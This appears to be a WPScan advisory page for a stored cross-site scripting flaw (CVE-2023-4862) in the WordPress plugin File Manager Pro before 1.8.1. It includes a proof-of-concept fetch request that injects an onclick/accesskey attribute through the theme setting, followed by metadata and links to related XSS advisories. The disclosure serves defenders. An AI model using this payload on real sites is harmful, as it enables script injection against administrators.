File Manager Pro < 1.8.1 – Admin+ Stored Cross-Site Scripting | CVE 2023-4862 | Plugin Vulnerabilities

Description

The plugin does not adequately validate and escape some inputs, leading to XSS by high-privilege users.

Proof of Concept

As an admin, open the File Manager and run the following JS code:

fetch("http://localhost:10008/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=selector_themes&themesValue=dark-slim\"+accesskey=X+onclick=alert(/XSS/)+\"&nonce=" + wpData.nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

As a super-admin, open the File Manager and press the Access Key combination (Firefox for Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X) to trigger the XSS.

Affects Plugins

Fixed in 1.8.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

81821bf5-69e1-4005-b3eb-d541490909cc

Timeline

Publicly Published

2023-09-19 (about 2 years ago)

Added

2023-09-19 (about 2 years ago)

Last Updated

2023-09-19 (about 2 years ago)

Other

Published

Title

Published

2020-07-13

Title

Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS

Published

2023-04-12

Title

ChatBot < 4.4.9 - Unauthenticated Stored XSS

Published

2024-06-13

Title

Cooked – Recipe Management <= Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-01-24

Title

WP VR < 8.5.15 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-02-21

Title

Elementor Addon Elements < 1.13 - Contributor+ Stored XSS